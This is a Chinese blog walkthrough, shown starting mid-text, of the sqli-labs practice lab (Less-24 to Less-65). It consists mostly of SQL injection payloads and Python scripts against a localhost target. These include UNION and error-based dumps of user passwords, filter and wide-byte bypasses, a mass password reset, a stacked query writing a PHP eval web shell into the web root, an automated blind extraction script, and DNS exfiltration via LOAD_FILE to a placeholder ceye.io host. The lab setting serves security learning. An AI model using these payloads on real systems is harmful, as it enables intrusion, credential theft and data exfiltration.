' LIMIT 0,1
select *,* from XX where id = '1'-- -' LIMIT 0,1

''
->
ok
select *,* from XX where id = '''' LIMIT 0,1

1''
->
ok

1#
->
ok

'1' and 0--+
->
1' and 0 ' LIMIT 0,1
select *,* from XX where id = '    '1' and 0--+' LIMIT 0,1

过滤注释,bypass:
select *,* from XX where id = '
' or 1 union select 1,2,'3
' LIMIT 0,1

1' union 1,2,3||'1
select *,* from XX where id = '
1' union 1,2,3||'1
' LIMIT 0,1

利用:
报错:
1' union select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)),2,3||'1

时间:
' or 1 union select (select sleep(1) from (select 1,2)x where length(database())=7),2,'3

代码

from requests import *
import re

for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html


Day24-Less24

分析

UPDATE table SET password = '' WHERE username = '' and password = ''
INSERT INTO("username","password") VALUES('2','1');

1') or 1#
1" or 1#

1")#
INSERT INTO("username","password") VALUES('','1');


select (updatexml(1,concat('*',(select username from security.users limit 0,1)),1)) from (select 1,2)x
注册一个用户:
' or 1 or '
密码为 hack
然后修改密码为 hackme,提交后数据库全部的用户密码都为 hackme
UPDATE table SET password = 'hackme' WHERE username = '
' or 1 or '
'  and password = ''
比较奇怪的地方是,这样修改的时候,后台貌似能检测到,看了一下源码,有以下判断:
$row = mysql_affected_rows();
if($row==1)
那就能解释这个问题了
但是 即使返回了错误页面,数据库实际上已经执行了


假如你知道管理员的账号,那么你可以注册一个
admin'#,密码为 troy
然后登陆修改密码
UPDATE table SET password = 'troy' WHERE username = 'admin'#' and password = 'troy'
实现重置管理员密码

用户名密码字段长度限制,没法再深入
' or 1 or '就占用 11 个字符了,只剩 9 个字符可用,database()都有 10 个字符

Day25-Less25

分析



0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select password from security.users limit 0,1)),1)) from (select 1,2)x)--+
password 中的 or 被过滤成 passwd,报错
Unknown column 'passwd' in 'field list'
改成下面就 ok 了

0'|(select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

还可以:
0' oorr (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'*',(select passwoorrd from security.users limit 0,1)),1)) from (select 1,2)x)--+

利用的话
0' union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users--+

Day26-Less25a

分析

数字型
盲注
基于错误:
0 oorr length(database())=7

时间:
1 aandnd (select sleep(1) from (select 1,2,3 )x where length(database())=8)

其他利用
0 union select 1,2,group_concat(username,'*',passwoorrd,'<br>') from users

Day27-Less26

分析

select *,* from XX where id = '$id' LIMIT 0,1

1'
->
'1'' LIMIT 0,1
select *,* from XX where id = '1'' LIMIT 0,1

'1'
->
1'' LIMIT 0,1
select *,* from XX where id = ''1'' LIMIT 0,1


select *,* from XX where id = '0' or 1 or '' LIMIT 0,1

基于报错:
0%27%a0oorr%a0length(database())=8%a0oorr%a0%27
1%27%a0aandnd%a0(select%a0(updatexml(1,concat(%27|%27,(select%a0username%a0from%a0security.users%a0limit%a00,1),%27<>%27,(select%a0passwoorrd%a0from%a0security.users%a0limit%a00,1)),1))%a0from%a0(select%a01,2)x)%a0oorr%a0%27

或者
0'%a0union%a0select%a01,2,group_concat(username,'<>',passwoorrd,'<br>')%a0from%a0users%a0where%a0'1


select *,* from XX where id = '0' or (select (updatexml(1,concat('*',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or '' LIMIT 0,1


代码

from requests import *
import re

for i in range(256):
    row = "0' oorr 1 oorr '"
    row = row.replace(' ','%%%x' %(i))
    html = get("http://localhost/sqllab/Less-26/?id="+row).text
    print re.findall('result:(.+)</font> ',html)[0]
    if 'Dumb' in html:
        print row
        print html

Day28-Less26a

分析

0%27%a0oorr%a01%a0oorr%a0%27

基于错误
0%27%a0oorr%a0length(database())=7%a0oorr%a0%27

这个没报错
1')%a0union%a0select%a01,2,3%a0from%a0users%a0where%a0('1
即
1') union select 1,2,3 from users where ('1

所以可以利用如下
0%27)%a0union%a0select%a01,2,group_concat(username,%27*%27,passwoorrd,%27%3Cbr%3E%27)%a0from%a0users%a0where%a0(%271
即
0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1


应该有个判断,如果有错误也不抛异常
比如下面这句是 gg 的
1')  and  (select  (updatexml(1,concat('|',(select   username   from   security.users   limit   0,1),'',(select   password   from   security.users   limit   0,1)),1))  from  (select   1,2)x)  or  ('0

代码

from requests import *
import re

#for i in range(256):
    #row = "0' oorr 1 oorr '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-26a/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


row = "0') or (select (updatexml(1,concat('|',(select username from security.users limit 0,1),'<>',(select password from security.users limit 0,1)),1)) from (select 1,2)x) or ('"
row = row.replace(' ','%a0').replace('or','oorr')

html = get("http://localhost/sqllab/Less-26a/?id="+row).text
print html
print 'XPATH' in html
print row

Day29-Less27

分析


只过滤了空格以及 union、select, sql 大小写不敏感,随便大写一下就过了,空格用 %a0
或者多嵌套几层
0\" uunionnion seseleselectctlect 1,2,group_concat(username,'<>',password,'<br>') from users where \"1
select 貌似过滤了几次,要多嵌套几层

EXEC('se'+'lect'+'* from users;' )


很简单:
0' or (selecT (updatexml(1,concat('|',(selecT username from security.users limit 0,1),'<>',(selecT password from security.users limit 0,1)),1)) from (selecT 1,2)x) or '

当然也有:
0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1

和前几题一样的

代码

from requests import *
import re

#for i in range(256):
    #row = "0' or 1 or '"
    #row = row.replace(' ','%%%x' %(i))
    #html = get("http://localhost/sqllab/Less-27/?id="+row).text
    #print re.findall('result:(.+)</font> ',html)[0]
    #if 'Dumb' in html:
        #print row
        #print html


row = "0' unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where '1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27/?id="+row).text
print html
print 'XPATH' in html
print row

Day30-Less27a

分析

对比 27,只是单引号改为双引号,而且不显示具体错误,其他一样的
既然屏蔽错误显示,报错注入当然也就不能用了

代码

from requests import *
import re

row = "0\" unioN selecT 1,2,group_concat(username,'<>',password,'<br>') from users where \"1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-27a/?id="+row).text
print html
print 'Dumb' in html
print row

Day31-Less28

分析

加了圆括号,其他没变
0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1

代码

from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28/?id="+row).text
print html
print 'Dumb' in html
print row

Day32-Less28a

分析

连空格都没过滤,,,,emmmmm  比起前几题很简单了,随便过

代码

from requests import *
import re

row = "0') union select 1,2,group_concat(username,'<>',password,'<br>') from users where ('1"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-28a/?id="+row).text
print html
print 'Dumb' in html
print row

Day33-Less29

分析

这题应该用 login.php 来玩
index.php 没啥用啊  

这题第一次接触的时候没审计代码怕是过不去
首先能猜出后面只允许数字过,剩下的就都不知道了

审计代码发现,先过一个 java_implimentation,把第一个叫 id 的参数拿出来,然后,把这个参数扔到 whitelist 的白名单过滤
但是,$id=$_GET['id'];取得却是最后一次出现的 id,,也就是说,对于第二个出现的 id,毫无过滤。所以可以这样
?id=1&id=1'
就可以看到报错了
'1'' LIMIT 0,1
接下来该干啥干啥
select XX,XX,XX from XXX where id='' LIMIT 0,1

select XX,XX,XX from XXX where id='
0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1
' LIMIT 0,1

?id=1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1

代码

from requests import *
import re

row = "1&id=0' union select 1,2,group_concat(username,'<>',password,'<br>') from users where '1'--+"
row = row.replace(' ','%a0')

html = get("http://localhost/sqllab/Less-29/login.php?id="+row).text
print html

Day34-Less30

分析

与 29 相比,单引号改为双引号,其他一样
?id=1&id=0" union select 1,2,group_concat(username,'<>',password,'<br>') from users where "1

Day35-Less31

分析

与 30 相比,加了括号,其他一样
?id=1&id=0") union select 1,2,group_concat(username,'<>',password,'<br>') from users where ("1

Day36-Less32

分析

0' union select 1,2,group_concat(username,CHAR(61),password) from users--+

利用宽字节注入。
' -> %d6'

代码

from requests import *
import re

row = "0' union select 1,2,group_concat(username,CHAR(61),password) from users--+"
row = row.replace('\'','%d6\'')

html = get("http://localhost/sqllab/Less-32/?id="+row).text
print html
print 'Dumb' in html
print row

Day37-Less33

分析

和 32 一样

Day38-Less34

分析

如果报编码错误,那就运行一下这个:
alter table users convert to character set gbk;


0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-34/", data = pdata).text
print html
print 'Dumb' in html

Day39-Less35

分析

数值型

0 union select 1,2,group_concat(username,CHAR(61),password) from users

Day40-Less36

分析

依然可用宽字节
0%d6\' union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day41-Less37

分析

和 34 一毛一样
0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#

代码

from requests import *
import re

pdata = {
'uname': 'Dhakkan',
'passwd' : "0\xd6' union select 1,group_concat(username,CHAR(61),password) from users#"
}

html = post("http://localhost/sqllab/Less-37/", data = pdata).text
print html
print 'Dumb' in html

Day42-Less38

分析

Stacked injections:堆叠注入
就是多条语句,利用分号隔开
这题没有更好的场景,显得有点鸡肋
0' union select 1,2,group_concat(username,CHAR(61),password) from users--+
注入一句话倒是不错

Day43-Less39

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day44-Less40

分析

同 38
0') union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day45-Less41

分析

同 38
0 union select 1,2,group_concat(username,CHAR(61),password) from users--+

Day46-Less42

分析

报错在登录的时候可以爆出

pdata = {
'login_user': '1',
'login_password' : "' union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#",
}
不过返回的时候 XPATH syntax error 有截断,遍历一下就 OK 了:
ERROR 1105 (HY000): XPATH syntax error: 'Dumb<>Dumb<br>,Angelina<>I-kill-'
或者利用 concat 一个一个搞也行

这种情况下,不需要知道用户名
还可以这样
1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#




代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "1';SELECT 0x3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e into outfile 'D://wamp//www//web.php'#",
}

html = post("http://localhost/sqllab/Less-42/login.php", data = pdata).text
print html
print 'Dumb' in html

Day47-Less43

分析

同 42
加了括号
') union select 1,2,3 from users where extractvalue(1,concat('*',(select group_concat(username,'<>',password,'<br>') from users)))#

Day48-Less44

分析

基于时间
pdata = {
'login_user': '1',
'login_password' : "1' and (select sleep(2) from (select 1,2)x where length(database())=8)#",
}


不过这题可以重置所以用户的密码:
pdata = {
'login_user': '1',
'login_password' : "1' or '1' limit 1,1#",
}

来个更刺激的
' union select 1,group_concat(username,'=',password,'<br>'),3 from users#



select id,username,password from XXXX where username='1' and password='' union select 1,group_concat(username,'=',password,'<br>'),3 from users#' limit 0,1

代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "' union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-44/login.php", data = pdata).text
print html
print 'Dumb' in html

Day49-Less45

分析

和 44 一样,加了括号而已
') union select 1,group_concat(username,'=',password,'<br>'),3 from users#

代码

from requests import *
import re

pdata = {
'login_user': '1',
'login_password' : "') union select 1,group_concat(username,'=',password,'<br>'),3 from users#",
}

html = post("http://localhost/sqllab/Less-45/login.php", data = pdata).text
print html
print 'Dumb' in html

Day50-Less46

分析

sort 注入
1. 利用 rand(ture)和 rand(false)的结果不一样
?sort=rand(length(database())=7)
?sort=rand(length(database())=8)

2. 报错注入
?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))
1 and (extractvalue(rand(),concat(0x3a,version())),1)

3. 延时注入
1 and (select sleep(1) from (select 1,2)x where length(database())=8)

4.其他
into outfile 啥的,都行

Day51-Less47

分析

与 46 相比,无法使用 rand 以外,其他都一样

Day52-Less48

分析

数字型
错误被屏蔽,延时注入即可

Day53-Less49

分析

与 48 一样,只不过是单引号型
1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day54-Less50

分析

堆叠注入
但是可以用前面几题过
0 or (select (extractvalue(rand(),concat(0x3a,version())),1))--+
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day55-Less51

分析

和 50 一样,加了单引号

1' and (select sleep(1) from (select 1,2)x where length(database())=7)--+
0' or (select (extractvalue(rand(),concat(0x3a,version())),1))--+


Day56-Less52

分析

盲注
?sort=1 and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day57-Less53

分析

和 52 一样,加了引号而已

?sort=1' and (select sleep(1) from (select 1,2)x where length(database())=8)--+

Day58-Less54

分析

开始有意思了,限制查询 10 次
第一次
?id=1 正常
?id=1' 不正常,没报错
?id=1' or 1--+  正常
由于已知 databasename 是 challenges
那就先搞表名
?id=0' union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+
返回为

Your Login name:2
Your Password:35fb3t92ky<>id
,35fb3t92ky<>sessid
,35fb3t92ky<>secret_LKVY
,35fb3t92ky<>tryy

可以看到,表名为 at4bwg0te1,有 4 列:
id  sessid  secret_LKVY  tryy

?id=0' union select 1,2,group_concat(id,'<>',sessid,'<>',secret_LKVY,'<>',tryy,'<br>') from challenges.35fb3t92ky--+

代码

from requests import *
from re import *

def GetTableName():
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',table_name,'<>',column_name,'\n') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'#"
    }

    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>([a-z0-9]+)<>(.+)\n', html)

def GetColumnName(q,tablename):
    gdata = {
        'id': "0' union select 1,2,group_concat('=>',%s,'\n') from challenges.%s#" %(q,tablename)
    }
    r = get('http://localhost/sqllab/Less-54/index.php', params = gdata)
    html = r.text
    return findall(r'=>(.+)<>(.+)<>(.+)<>(.+)\n', html)[0]


table = GetTableName()
tableName = table[0][0]
columns = '  [-]'+'\n  [-]'.join(i[1] for i in table)
print '[+]TableName:', tableName
print '[+]CotablenamelumnsNames:\n', columns

q = ",'<>',".join(i[1] for i in table)
data = GetColumnName(q,tableName)

print '[!]Password is:', data[2]

Day59-Less55

分析

和 54 一样,只不过加了括号以及是数字型
0) union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges' or (0

?id=0) union select 1,2,group_concat(id,'<>',sessid,'<>',secret_25UU,'<>',tryy,'<br>') from challenges.e2du3yn5gq where (1

Day60-Less56

分析

和前 2 题一样的套路
?id=0') union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0') union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'<br>') from challenges.7j9km4qsh7--+

Day61-Less57

分析

和前 3 题一样的套路
?id=0" union select 1,2,group_concat(table_name,'<>',column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges'--+

?id=0" union select 1,2,group_concat(id,'<>',sessid,'<>',secret_ZV9U,'<>',tryy,'<br>') from challenges.7j9km4qsh7--+

Day62-Less58

分析

?id=0' or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0' or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+


?id=0' or (extractvalue(rand(),(select group_concat('<>',secret_2EOZ) from challenges.ae85jljdmd)))--+



Day63-Less59

分析

和 58 一样,不过是数字型
?id=0 or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0 or (extractvalue(rand(),(select group_concat('<>',secret_6GBR) from challenges.pebeduo6fx)))--+



Day64-Less60

分析

和 58 一样,不过是双引号加括号
?id=0") or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0") or (extractvalue(rand(),(select group_concat('<>',secret_QIN6) from challenges.ortaw2xc59)))--+



Day65-Less61

分析

和 58 一样,不过是单引号加双括号
?id=0')) or (extractvalue(rand(),(select group_concat('->',table_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat(column_name,'<br>') from information_schema.COLUMNS where TABLE_SCHEMA='challenges')))--+

?id=0')) or (extractvalue(rand(),(select group_concat('<>',secret_VSZ6) from challenges.est6bn4mqy)))--+

Day66-Less62

分析

盲注
交给 py 去做吧

不过次数应该会大于 130
找到了一个更好的办法,DNS 解析
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.xxxxxx.ceye.io\\abc'))

所以可以构造
http://localhost/sqllab/Less-62/?id=1') and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到
q1bcv0fqh9.xxxxxx.ceye.io

继续,得到表名
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

继续,得到 key
http://localhost/sqllab/Less-62/?id=1') and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_T82V FROM challenges.q1bcv0fqh9 limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

emm
有点开挂的赶脚..

代码

from requests import get
from string import ascii_letters, digits

def GuessTBNameLenth(n, name):
    global guessTime
    print '[+]Guessing TableName Length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.tables where TABLE_SCHEMA ='%s' limit %d,1),%d,1)) --+" %(name,n,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The TableName Lenth is', i-1
            return i-1
        i+=1

def GuessTBsNames(num, DBName):
    global guessTime
    no = 0
    name = ''
    length = GuessTBNameLenth(no, DBName)
    print '  [-]Guessing Table Name'
    for i in xrange(length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES where TABLE_SCHEMA ='%s' limit %d,1),%d,1)='%s' --+" %(DBName,no,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    print '  [-]Tables Names is:', name
    return name

def GuessCLMNum(tname,dname):
    global guessTime
    print '[+]Guessing Colunms num'
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s') --+" %(i,tname,dname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Colunm num is', i
            return i
        i+=1    

def GuessCLMLen(cnum, tname, dname):
    global guessTime
    i = 7
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s'  and TABLE_SCHEMA='%s' limit %d,1),%d,1)) --+" %(tname,dname,cnum,i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Colunm Lenth is', i-1
            return i-1
        i+=1

def GuessCLMName(DBName, tname):
    global guessTime

    print '[+]Guessing Colunms for', tname
    cnum = 2 #No.3
    length = GuessCLMLen(cnum, tname, DBName)
    name = 'secret_'
    for i in xrange(7,length):
        for n in ascii_letters+digits:
            guessTime += 1
            r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME ='%s' and TABLE_SCHEMA='%s' limit %d,1),%d,1)='%s' --+" %(tname,DBName,cnum,i+1,n))
            html = r.text
            if 'Your Login name' in html:
                name += n
                print '    [-]', name
                break

    data = GuessDatas(DBName, tname, name)
    print '  [-]The Colunms are',name

def GuessDatasnum(dname, tname, cname):
    global guessTime
    i = 0
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or %d=(SELECT count(%s) FROM %s.%s) --+" %(i,cname,dname,tname))   
        html = r.text
        if 'Your Login name' in html:
            print '  [-]The Datas num is', i
            return i
        i+=1

def GuessDataLen(dname, tname, cname, n):
    global guessTime
    print '    [-]Guessing data length'
    i = 1
    while 1:
        guessTime += 1
        r = get("http://localhost/sqllab/Less-62/?id=') or ascii(SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)) --+" %(cname, dname, tname, n, i))        
        html = r.text
        if 'Your Login name' not in html:
            print '  [-]The Data Lenth is', i-1
            return i-1
        i+=1

def GuessDatas(dname, tname, cname):
    global guessTime
    datanum = GuessDatasnum(dname, tname, cname)
    Data = []
    for no in range(datanum):
        length = GuessDataLen(dname, tname, cname, no)
        print '    [-]Guessing data'
        name = ''
        for i in xrange(length):
            for n in ascii_letters+digits:
                while 1:
                    try:
                        guessTime += 1
                        r = get("http://localhost/sqllab/Less-62/?id=') or SUBSTR((SELECT %s FROM %s.%s limit %d,1),%d,1)='%s' --+" %(cname, dname, tname, no,i+1,n))
                        break
                    except:
                        print 'Relaxing...'
                html = r.text
                if 'Your Login name' in html:
                    name += n
                    print '    [-]', name
                    break
        Data.append(name)
    print '  [-]All Datas of %s is:' %cname, Data
    return Data

guessTime = 0          
DBName = 'challenges'
TBsNum = 1
TBsNames = GuessTBsNames(TBsNum, DBName)
print
GuessCLMName(DBName, TBsNames)
print '[!]All Done!'
print guessTime

Day67-Less63

分析

和 62 一样,要么盲注,要么 DSN

?id=1' and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 ud7yymnibx

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_5YDC

?id=1' and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_5YDC FROM challenges.ud7yymnibx limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

Day68-Less64

分析

和 62 一样,要么盲注,要么 DSN

?id=1)) and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 ex06wyovlw

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_G074

?id=1)) and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_G074 FROM challenges.ex06wyovlw limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

Day69-Less65

分析

和 62 一样,要么盲注,要么 DSN

?id=1") and if((SELECT LOAD_FILE(CONCAT('\\\\',(SELECT TABLE_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1,1)--+

得到 gfpke05sif

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT column_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_SCHEMA='challenges' and column_NAME like 'sec%' limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

得到 secret_SWQ8

?id=1") and if(1,(SELECT LOAD_FILE(CONCAT('\\\\',(SELECT secret_SWQ8 FROM challenges.gfpke05sif limit 0,1),'.xxxxxx.ceye.io\\abc'))),1)--+

心得

sql 注入不仅仅局限于某种姿势,只有触类旁通才能熟练掌握
做这个 lab 的时候要手工注入,或者自己写脚本,不要用 sqlmap 之类的

End

What do you think?

本文标题: SqliLab 题解
原始链接: http://www.tr0y.wang/2017/12/11/SqliLab/
发布时间: 2017.12.11-23:04
最后更新: 2018.11.03-21:01
版权声明: 本站文章均采用CC BY-NC-SA 4.0协议进行许可。转载请注明出处!